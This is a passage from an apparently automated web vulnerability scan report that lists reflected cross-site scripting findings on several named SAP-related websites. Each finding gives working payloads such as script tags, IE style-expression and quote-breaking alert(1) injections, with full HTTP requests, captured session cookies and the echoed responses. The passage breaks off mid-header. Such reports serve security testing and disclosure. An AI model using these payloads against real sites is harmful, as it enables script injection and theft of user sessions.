Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f770"><script>alert(1)</script>5e7e43a56dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/swc/common.tao6f770"><script>alert(1)</script>5e7e43a56dc?v=2930 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 807
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/js/swc/common.tao6f770"><script>alert(1)</script>5e7e43a56dc">
...[SNIP]...

3.109. http://www.sapphirenow.com/login.aspx [ReturnUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The value of the ReturnUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcf2f"style%3d"x%3aexpression(alert(1))"34bced315ef was submitted in the ReturnUrl parameter. This input was echoed as fcf2f"style="x:expression(alert(1))"34bced315ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspxfcf2f"style%3d"x%3aexpression(alert(1))"34bced315ef HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:26:15 GMT
Content-Length: 42972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<input id="retUrl" type="hidden"value ="http://www.sapandasug.com/virtual/?ReturnUrl=http://www.sapphirenow.com/login.aspx?ReturnUrl=/default.aspxfcf2f"style="x:expression(alert(1))"34bced315ef" style="width: 668px" />
...[SNIP]...

3.110. http://www.sapphirenow.com/login.aspx [a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The value of the a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5 request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f5712%20style%3dx%3aexpression(alert(1))%20272adda801e was submitted in the a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5 parameter. This input was echoed as f5712 style=x:expression(alert(1)) 272adda801e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx&a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5=1f5712%20style%3dx%3aexpression(alert(1))%20272adda801e HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx&a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=jaulcs2tyzxxmgycdn1cnz55; X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; __utma=270210419.1641825112.1318688722.1318688722.1318692187.2; __utmb=270210419.1.10.1318692188; __utmc=270210419; __utmz=270210419.1318692188.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; 37021986-VID=5110247826455; 37021986-SKEY=6638045003516868152; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:29:52 GMT
Content-Length: 43078


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<input id="retUrl" type="hidden"value ="http://www.sapandasug.com/virtual/?ReturnUrl=http://www.sapphirenow.com/login.aspx?ReturnUrl=/default.aspx&a00f1"style="x:expression(alert(1))"5e28a9da3e5=1f5712 style=x:expression(alert(1)) 272adda801e" style="width: 668px" />
...[SNIP]...

3.111. http://www.sapphirenow.com/login.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a00f1"style%3d"x%3aexpression(alert(1))"5e28a9da3e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a00f1"style="x:expression(alert(1))"5e28a9da3e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx&a00f1"style%3d"x%3aexpression(alert(1))"5e28a9da3e5=1 HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:26:21 GMT
Content-Length: 42982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<input id="retUrl" type="hidden"value ="http://www.sapandasug.com/virtual/?ReturnUrl=http://www.sapphirenow.com/login.aspx?ReturnUrl=/default.aspx&a00f1"style="x:expression(alert(1))"5e28a9da3e5=1" style="width: 668px" />
...[SNIP]...

3.112. http://www.sapvirtualevents.com/teched [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8105'-alert(1)-'ed14687c86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /teched?d8105'-alert(1)-'ed14687c86f=1 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:55 GMT
Content-Length: 92618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<script type="text/javascript">if(sap_token != null) window.location.href = 'http://www.sapvirtualevents.com/teched/?d8105'-alert(1)-'ed14687c86f=1default.aspx&ssostatus=1&info=' + sap_token </script>
...[SNIP]...

3.113. http://www.sapvirtualevents.com/teched/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4b6c'-alert(1)-'d067c1ecac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /teched/?d4b6c'-alert(1)-'d067c1ecac1=1 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:40 GMT
Content-Length: 92618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<script type="text/javascript">if(sap_token != null) window.location.href = 'http://www.sapvirtualevents.com/teched/?d4b6c'-alert(1)-'d067c1ecac1=1default.aspx&ssostatus=1&info=' + sap_token </script>
...[SNIP]...

3.114. http://www.sapvirtualevents.com/teched/Sessions.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/Sessions.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af3a6'-alert(1)-'cb07f8d2693 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /teched/Sessions.aspx?af3a6'-alert(1)-'cb07f8d2693=1 HTTP/1.1
Host: www.sapvirtualevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:05:07 GMT
Connection: close
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 81914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<script type="text/javascript">if(sap_token != null) window.location.href = 'http://www.sapvirtualevents.com/teched/sessions.aspx?af3a6'-alert(1)-'cb07f8d2693=1&ssostatus=1&info=' + sap_token </script>
...[SNIP]...

3.115. http://www.sapvirtualevents.com/teched/default.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5afd5'-alert(1)-'3a8fca97ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /teched/default.aspx?5afd5'-alert(1)-'3a8fca97ca=1 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55; IsFirstTimeLogin=1; userID=1; securityRoleID=0; .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||edcbb5be-eddd-4d03-b903-d45503e9170c|United States|4b117873-111d-43fb-aa45-4e60c941153b|true

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:56 GMT
Content-Length: 92628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<script type="text/javascript">if(sap_token != null) window.location.href = 'http://www.sapvirtualevents.com/teched/default.aspx?5afd5'-alert(1)-'3a8fca97ca=1&ssostatus=1&info=' + sap_token </script>
...[SNIP]...

3.116. http://www.sapvirtualevents.com/teched/login.aspx [ReturnUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/login.aspx

Issue detail

The value of the ReturnUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 433fe'%3balert(1)//fea0f539288 was submitted in the ReturnUrl parameter. This input was echoed as 433fe';alert(1)//fea0f539288 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26433fe'%3balert(1)//fea0f539288 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:56 GMT
Content-Length: 92626


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<script type="text/javascript">if(sap_token != null) window.location.href = 'http://www.sapvirtualevents.com/teched/default.aspx?433fe';alert(1)//fea0f539288&ssostatus=1&info=' + sap_token </script>
...[SNIP]...

3.117. http://www.sapvirtualevents.com/teched/sessiondetails.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/sessiondetails.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee866'-alert(1)-'cfeab9a4511 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /teched/sessiondetails.aspx?ee866'-alert(1)-'cfeab9a4511=1 HTTP/1.1
Host: www.sapvirtualevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:05:11 GMT
Connection: close
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 87238


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<script type="text/javascript">if(sap_token != null) window.location.href = 'http://www.sapvirtualevents.com/teched/sessiondetails.aspx?ee866'-alert(1)-'cfeab9a4511=1&ssostatus=1&info=' + sap_token </script>
...[SNIP]...

3.118. http://www.sdn.sap.com/irj/scn/advancedsearch [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/advancedsearch

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 926f2"><a>1b7807551cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/advancedsearch?query=xss+password+help+faq+contact&926f2"><a>1b7807551cd=1 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fq%2ftop_weblogs; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318691787|check#true#1318689987; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Asdnweblogs%253Apopularposts%7C1318691728224%3B%20pe%3Dno%2520value%7C1318691728230%3B%20c3%3Dno%2520value%7C1318691728253%3B%20s_nr%3D1318689928258-New%7C1321281928258%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293528260%3B%20s_visit%3D1%7C1318691728263%3B%20gpv_p47%3Dno%2520value%7C1318691728265%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Asdnweblogs%2525253Apopularposts%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.searchboxform.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 28856
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 15:01:13 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/advancedsearch?query=xss+password+help+faq+contact&926f2"><a>1b7807551cd=1">
...[SNIP]...

3.119. http://www.sdn.sap.com/irj/scn/advancedsearch [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/advancedsearch

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d29"><a>12c19bdc070 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/advancedsearch?query=xss+password+help+faq+contact95d29"><a>12c19bdc070 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fq%2ftop_weblogs; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318691787|check#true#1318689987; 